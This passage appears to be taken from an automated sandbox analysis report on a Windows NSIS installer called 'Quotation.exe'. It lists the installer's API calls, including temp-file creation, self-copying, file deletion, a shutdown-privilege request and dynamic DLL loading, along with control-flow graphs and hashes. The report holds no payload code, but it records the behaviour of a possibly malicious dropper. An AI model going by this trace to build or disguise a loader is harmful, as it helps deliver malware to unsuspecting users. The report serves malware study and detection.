36->45 39 4038c8-4038d3 37->39 40 4038bd-4038c6 37->40 42 4038d5-4038dc 39->42 43 4038de-4038ed 39->43 40->39 40->40 42->43 48 403948-40395c call 4065d4 43->48 49 4038ef-4038fb 43->49 44->45 55 4039c4-4039f4 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403c83 44->55 57 403bc4 45->57 58 403a19-403a1f 45->58 65 403964-40396a 48->65 66 40395e-403961 48->66 53 403915-40391b 49->53 54 4038fd-403904 49->54 61 403937-40393e 53->61 62 40391d-403924 53->62 59 403906-403909 54->59 60 40390b 54->60 55->45 80 403bc2 55->80 69 403bc8-403bd5 call 4036b0 OleUninitialize 57->69 67 403a21-403a33 call 4065d4 58->67 68 403a84-403a8b call 405a1c 58->68 59->53 59->60 60->53 61->48 64 403940-403946 61->64 62->61 70 403926-40392d 62->70 64->48 75 403974-403983 call 406af8 64->75 65->36 76 40396c-40396f 65->76 66->65 86 403a49-403a4b 67->86 83 403a90-403a92 68->83 84 403bd7-403be2 call 406a86 69->84 85 403bea-403bf1 69->85 72 403934 70->72 73 40392f-403932 70->73 72->61 73->61 73->72 75->36 76->37 80->57 83->69 94 403be4 ExitProcess 84->94 90 403bf3-403c09 GetCurrentProcess OpenProcessToken 85->90 91 403c6f-403c7e 85->91 87 403a35-403a3b 86->87 88 403a4d-403a54 86->88 98 403a46 87->98 99 403a3d-403a44 87->99 92 403a56-403a66 call 406616 88->92 93 403a97-403aaf call 4064da lstrcatW 88->93 96 403c0b-403c39 LookupPrivilegeValueW AdjustTokenPrivileges 90->96 97 403c3f-403c4d call 4068c4 90->97 91->94 106 403a6c-403a82 call 406af8 * 2 92->106 107 403bbe-403bc0 92->107 110 403ac0-403ae1 lstrcatW lstrcmpiW 93->110 111 403ab1-403abb lstrcatW 93->111 96->97 108 403c5b-403c66 ExitWindowsEx 97->108 109 403c4f-403c59 97->109 98->86 99->88 99->98 106->68 107->69 108->91 112 403c68-403c6a call 401533 108->112 109->108 109->112 110->107 113 403ae7-403aee 110->113 111->110 112->91 116 403af0-403af5 call 405e1c 113->116 117 403af7 call 405dfc 113->117 124 403afc-403b0e SetCurrentDirectoryW 116->124 117->124 126 403b10-403b1a call 406af8 124->126 127 403b1f-403b39 call 406af8 124->127 126->127 131 403b3a-403b58 call 405e98 DeleteFileW 127->131 134 403ba7-403bb1 131->134 135 403b5a-403b6e CopyFileW 131->135 134->131 137 403bb3-403bb9 call 40621b 134->137 135->134 136 403b70-403b95 call 40621b call 405e98 call 4066b4 135->136 144 403b9a-403b9c 136->144 137->107 144->134 145 403b9e-403ba5 CloseHandle 144->145 145->134
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008001), ref: 004036F6
                                                                • GetVersionExW.KERNEL32(?), ref: 0040371F
                                                                • GetVersionExW.KERNEL32(?), ref: 00403732
                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037DA
                                                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403814
                                                                • OleInitialize.OLE32(00000000), ref: 0040381B
                                                                • SHGetFileInfoW.SHELL32(004085B0,00000000,?,000002B4,00000000), ref: 0040383A
                                                                • GetCommandLineW.KERNEL32(007A7540,NSIS Error), ref: 0040384F
                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Quotation.exe",?,"C:\Users\user\Desktop\Quotation.exe",00000000), ref: 0040389B
                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403999
                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039AA
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039B6
                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039CA
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039D2
                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004039E3
                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004039EB
                                                                • DeleteFileW.KERNELBASE(1033), ref: 00403A05
                                                                  • Part of subcall function 004033CB: GetTickCount.KERNEL32 ref: 004033DE
                                                                  • Part of subcall function 004033CB: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation.exe,00000400), ref: 004033FA
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quotation.exe",00000000,00000000), ref: 00403AA8
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00408600,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quotation.exe",00000000,00000000), ref: 00403ABB
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quotation.exe",00000000,00000000), ref: 00403ACA
                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quotation.exe",00000000,00000000), ref: 00403AD9
                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B01
                                                                • DeleteFileW.KERNEL32(0079F200,0079F200,?,007A9000,?), ref: 00403B54
                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\Quotation.exe,0079F200,00000001), ref: 00403B66
                                                                • CloseHandle.KERNEL32(00000000,0079F200,0079F200,?,0079F200,00000000), ref: 00403B9F
                                                                  • Part of subcall function 00405DFC: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004039A0), ref: 00405E04
                                                                  • Part of subcall function 00405DFC: GetLastError.KERNEL32 ref: 00405E0E
                                                                • OleUninitialize.OLE32(00000000), ref: 00403BCD
                                                                • ExitProcess.KERNEL32 ref: 00403BE4
                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BFA
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403C01
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C16
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403C39
                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5E
                                                                  • Part of subcall function 004065D4: CharNextW.USER32(?,0040389A,"C:\Users\user\Desktop\Quotation.exe",?,"C:\Users\user\Desktop\Quotation.exe",00000000), ref: 004065EA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                                                • String ID: "C:\Users\user\Desktop\Quotation.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\Quotation.exe$C:\Users\user\overlays\besvangredes$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                • API String ID: 1152188737-511365611
                                                                • Opcode ID: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
                                                                • Instruction ID: ef6c2823884109cd5a884fcd16d1840cc0f2fcd0ed87f9f7bcd5e2f232321f3d
                                                                • Opcode Fuzzy Hash: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
                                                                • Instruction Fuzzy Hash: B8D14DB16043106AD7207FB19D45B6B3EECAB4574AF05443FF585B62D2DBBC8A40872E
                                                                APIs
                                                                  • Part of subcall function 733F12F8: GlobalAlloc.KERNEL32(00000040,?,733F11C4,-000000A0), ref: 733F1302
                                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 733F294E
                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 733F29A4
                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 733F29AF
                                                                • GlobalFree.KERNEL32(00000000), ref: 733F29C0
                                                                • GlobalFree.KERNEL32(?), ref: 733F2A44
                                                                • GlobalFree.KERNEL32(?), ref: 733F2A4A
                                                                • GlobalFree.KERNEL32(?), ref: 733F2A50
                                                                • GetModuleHandleW.KERNEL32(00000008), ref: 733F2B1A
                                                                • LoadLibraryW.KERNEL32(00000008), ref: 733F2B2B
                                                                • GetProcAddress.KERNEL32(?,?), ref: 733F2B82
                                                                • lstrlenW.KERNEL32(00000808), ref: 733F2B9D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2288029483.00000000733F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 733F0000, based on PE: true
                                                                • Associated: 00000000.00000002.2287862220.00000000733F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288085712.00000000733F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288109582.00000000733F6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_733f0000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
                                                                • String ID:
                                                                • API String ID: 1042148487-0
                                                                • Opcode ID: d65ac5b9edea331fcff944f2ba495863a674676797a5e721e1a50978661cc20b
                                                                • Instruction ID: 87a47669dc3e29a898897be494e99053cdaea419ae04c3b842388f2249d5d477
                                                                • Opcode Fuzzy Hash: d65ac5b9edea331fcff944f2ba495863a674676797a5e721e1a50978661cc20b
                                                                • Instruction Fuzzy Hash: 56429279A0830BDFD325CF24C940B6AB7F9FF88311F844A2EE49AD6294D770D5458B91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 866 4066f7-406720 call 406616 869 406722-406734 DeleteFileW 866->869 870 406739-406743 866->870 871 4068b8-4068c1 869->871 872 406745-406747 870->872 873 406756-406769 call 406af8 870->873 874 4068a7-4068ad 872->874 875 40674d-406750 872->875 880 406779-40677a call 406cee 873->880 881 40676b-406777 lstrcatW 873->881 879 4068b7 874->879 875->873 877 406870-406878 call 4065ad 875->877 877->879 886 40687a-40688e call 406534 call 406563 877->886 879->871 883 40677f-406784 880->883 881->883 887 406790-406796 lstrcatW 883->887 888 406786-40678e 883->888 902 406890-406892 886->902 903 4068af-4068b2 call 405d18 886->903 889 406798-4067bb lstrlenW FindFirstFileW 887->889 888->887 888->889 891 4067c1-4067c3 889->891 892 406859-40685e 889->892 894 4067c4-4067c9 891->894 892->879 896 406860-40686e 892->896 897 4067e2-4067f5 call 406af8 894->897 898 4067cb-4067d1 894->898 896->874 896->877 911 4067f7-4067fe 897->911 912 406809-406812 call 406563 897->912 900 4067d3-4067d8 898->900 901 40683b-40684c FindNextFileW 898->901 900->897 905 4067da-4067e0 900->905 901->894 908 406852-406853 FindClose 901->908 902->874 906 406894-4068a5 call 405d18 call 40621b 902->906 903->879 905->897 905->901 906->879 908->892 911->901 914 406800-406802 call 4066f7 911->914 919 406833-406836 call 405d18 912->919 920 406814-406816 912->920 922 406807 914->922 919->901 923 406818-406829 call 405d18 call 40621b 920->923 924 40682b-406831 920->924 922->901 923->901 924->901
                                                                APIs
                                                                  • Part of subcall function 00406616: lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,75923420,?), ref: 0040666A
                                                                  • Part of subcall function 00406616: GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B
                                                                • DeleteFileW.KERNELBASE(?,?,00000000,75923420,?), ref: 00406723
                                                                • lstrcatW.KERNEL32(007A3A88,\*.*,007A3A88,?,00000000,?,00000000,75923420,?), ref: 00406775
                                                                • lstrcatW.KERNEL32(?,004082B0,?,007A3A88,?,00000000,?,00000000,75923420,?), ref: 00406796
                                                                • lstrlenW.KERNEL32(?), ref: 00406799
                                                                • FindFirstFileW.KERNEL32(007A3A88,?), ref: 004067B0
                                                                • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00406841
                                                                • FindClose.KERNEL32(00000000), ref: 00406853
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                                                • String ID: \*.*
                                                                • API String ID: 2636146433-1173974218
                                                                • Opcode ID: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
                                                                • Instruction ID: 325cce783f2df783a7673d4e22b29853c472d97363b16a381ac5d63d2c539c61
                                                                • Opcode Fuzzy Hash: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
                                                                • Instruction Fuzzy Hash: 2741373210631069D720BB658D05A6B72ACDF92318F16853FF893B21D1EB3C8965C6AF
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
                                                                • FindClose.KERNEL32(00000000), ref: 004065C4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Find$CloseFileFirst
                                                                • String ID:
                                                                • API String ID: 2295610775-0
                                                                • Opcode ID: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
                                                                • Instruction ID: 54e165a9d952ab4a9c526d77f24574b80d9b4166436818e4e9d84c3548612847
                                                                • Opcode Fuzzy Hash: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
                                                                • Instruction Fuzzy Hash: A5D012315191607FC2501B387F0C84B7A599F65372B114B36B4A6F51E4DA348C628698

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 146 404f70-404f89 147 405111-405123 146->147 148 404f8f-404f95 146->148 150 405125-405165 GetDlgItem * 2 call 4054f8 SetClassLongW call 401533 147->150 151 40516b-40517f 147->151 148->147 149 404f9b-404f9e 148->149 152 404fa0-404fb5 SetWindowPos 149->152 153 404fba-404fbd 149->153 150->151 155 405181-405183 151->155 156 4051bd-4051c2 call 4054c6 151->156 157 4050fd 152->157 158 40500d-405013 153->158 159 404fbf-404fde ShowWindow 153->159 162 4051b5-4051b7 155->162 163 405185-405190 call 401399 155->163 168 4051c7-4051e6 156->168 165 405101-40510c call 405739 157->165 169 405015-40502a DestroyWindow 158->169 170 40502f-405032 158->170 159->165 167 404fe4-404ffa GetWindowLongW 159->167 162->156 166 405488 162->166 163->162 182 405192-4051b0 SendMessageW 163->182 180 40548a-405491 165->180 166->180 167->165 174 405000-405008 ShowWindow 167->174 175 4051e8-4051f3 call 401533 168->175 176 4051f9-4051ff 168->176 177 40546c-405473 169->177 178 405034-405042 SetWindowLongW 170->178 179 405047-40504d 170->179 174->165 175->176 186 405205-405207 176->186 187 405448-405461 DestroyWindow EndDialog 176->187 177->166 185 405475-405477 177->185 178->180 179->157 188 405053-40506d GetDlgItem 179->188 182->180 185->166 191 405479-405482 ShowWindow 185->191 186->187 192 40520d-405264 call 405e98 call 4054f8 * 3 GetDlgItem 186->192 189 405467 187->189 193 405092-405097 188->193 194 40506f-405088 SendMessageW IsWindowEnabled 188->194 189->177 191->166 222 405272-4052c1 ShowWindow KiUserCallbackDispatcher * 2 EnableWindow 192->222 223 405266-40526e 192->223 195 405099-40509a 193->195 196 40509c-40509f 193->196 194->166 198 40508e 194->198 199 4050dd-4050e2 call 405936 195->199 200 4050a1-4050a8 196->200 201 4050ae-4050b1 196->201 198->193 199->165 204 4050e4-4050f7 SendMessageW 200->204 205 4050aa-4050ac 200->205 201->204 206 4050b3-4050ba 201->206 204->157 205->199 210 4050ca-4050d3 call 401533 206->210 211 4050bc-4050c8 call 401533 206->211 210->165 220 4050d5 210->220 219 4050db 211->219 219->199 220->219 224 4052c3-4052c4 222->224 225 4052c6 222->225 223->222 226 4052c7-4052f2 GetSystemMenu EnableMenuItem SendMessageW 224->226 225->226 227 4052f4-405309 SendMessageW 226->227 228 40530b 226->228 229 405311-405357 call 4054e1 call 405cf9 call 406af8 lstrlenW call 405e98 SetWindowTextW call 401399 227->229 228->229 229->168 240 40535d-40535f 229->240 240->168 241 405365-405369 240->241 242 405388-40539c DestroyWindow 241->242 243 40536b-405371 241->243 242->189 245 4053a2-4053cf CreateDialogParamW 242->245 243->166 244 405377-40537d 243->244 244->168 246 405383 244->246 245->177 247 4053d5-40542c call 4054f8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401399 245->247 246->166 247->166 252 40542e-405441 ShowWindow call 4054c6 247->252 254 405446 252->254 254->189
                                                                APIs
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAF
                                                                • ShowWindow.USER32(?), ref: 00404FD9
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404FEA
                                                                • ShowWindow.USER32(?,00000004), ref: 00405006
                                                                • GetDlgItem.USER32(?,00000001), ref: 0040512D
                                                                • GetDlgItem.USER32(?,00000002), ref: 00405137
                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00405151
                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519F
                                                                • GetDlgItem.USER32(?,00000003), ref: 0040524E
                                                                • ShowWindow.USER32(00000000,?), ref: 00405277
                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040528B
                                                                • KiUserCallbackDispatcher.NTDLL(?), ref: 0040529F
                                                                • EnableWindow.USER32(?), ref: 004052B7
                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CE
                                                                • EnableMenuItem.USER32(00000000), ref: 004052D5
                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004052E6
                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FD
                                                                • lstrlenW.KERNEL32(Litteraturhistoriens Setup: Installing,?,Litteraturhistoriens Setup: Installing,00000000), ref: 0040532E
                                                                  • Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll,?,?,?), ref: 0040604E
                                                                • SetWindowTextW.USER32(?,Litteraturhistoriens Setup: Installing), ref: 00405346
                                                                  • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                  • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                • DestroyWindow.USER32(?,00000000), ref: 0040538E
                                                                • CreateDialogParamW.USER32(?,?,-007A8560), ref: 004053C2
                                                                  • Part of subcall function 004054F8: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405512
                                                                • GetDlgItem.USER32(?,000003FA), ref: 004053EB
                                                                • GetWindowRect.USER32(00000000), ref: 004053F2
                                                                • ScreenToClient.USER32(?,?), ref: 004053FE
                                                                • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405417
                                                                • ShowWindow.USER32(00000008,?,00000000), ref: 00405436
                                                                  • Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                • ShowWindow.USER32(?,0000000A), ref: 0040547C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                                                • String ID: Litteraturhistoriens Setup: Installing
                                                                • API String ID: 162979904-3759432448
                                                                • Opcode ID: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
                                                                • Instruction ID: 456415ec42eff5e8f6a9a9f0208e2dc106d0a6226250255d67da48920511729f
                                                                • Opcode Fuzzy Hash: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
                                                                • Instruction Fuzzy Hash: 38D1C071904B10ABDB20AF21EE44A6B7B68FB89355F00853EF545B21E1CA3D8851CFAD

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 255 405a1c-405a37 call 4068c4 258 405a39-405a49 call 4065fd 255->258 259 405a4b-405a81 call 406955 255->259 266 405aa4-405acd call 40595d call 406616 258->266 264 405a83-405a94 call 406955 259->264 265 405a99-405a9f lstrcatW 259->265 264->265 265->266 273 405ad3-405ad8 266->273 274 405b65-405b6d call 406616 266->274 273->274 275 405ade-405af9 call 406955 273->275 280 405b7b-405ba9 LoadImageW 274->280 281 405b6f-405b76 call 405e98 274->281 279 405afe-405b07 275->279 279->274 282 405b09-405b0f 279->282 284 405c28-405c30 call 401533 280->284 285 405bab-405bd6 RegisterClassW 280->285 281->280 287 405b11-405b1f call 4065d4 282->287 288 405b22-405b30 lstrlenW 282->288 296 405ce2-405ce4 284->296 297 405c36-405c41 call 40595d 284->297 289 405bd8-405bda 285->289 290 405bdf-405c23 SystemParametersInfoW CreateWindowExW 285->290 287->288 293 405b32-405b40 lstrcmpiW 288->293 294 405b58-405b60 call 406534 call 406af8 288->294 295 405ce5-405cec 289->295 290->284 293->294 300 405b42-405b4c GetFileAttributesW 293->300 294->274 296->295 308 405c47-405c61 ShowWindow call 40617c 297->308 309 405cc9-405cd1 call 405842 297->309 301 405b52-405b53 call 406cee 300->301 302 405b4e-405b50 300->302 301->294 302->294 302->301 316 405c63-405c68 call 40617c 308->316 317 405c6d-405c7e GetClassInfoW 308->317 314 405cd3-405cd9 309->314 315 405ced-405cef call 401533 309->315 314->296 318 405cdb-405cdd call 401533 314->318 324 405cf4 315->324 316->317 321 405c80-405c94 GetClassInfoW RegisterClassW 317->321 322 405c96-405cb9 DialogBoxParamW call 401533 317->322 318->296 321->322 326 405cbe-405cc7 call 403cd6 322->326 324->324 326->295
                                                                APIs
                                                                  • Part of subcall function 004068C4: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
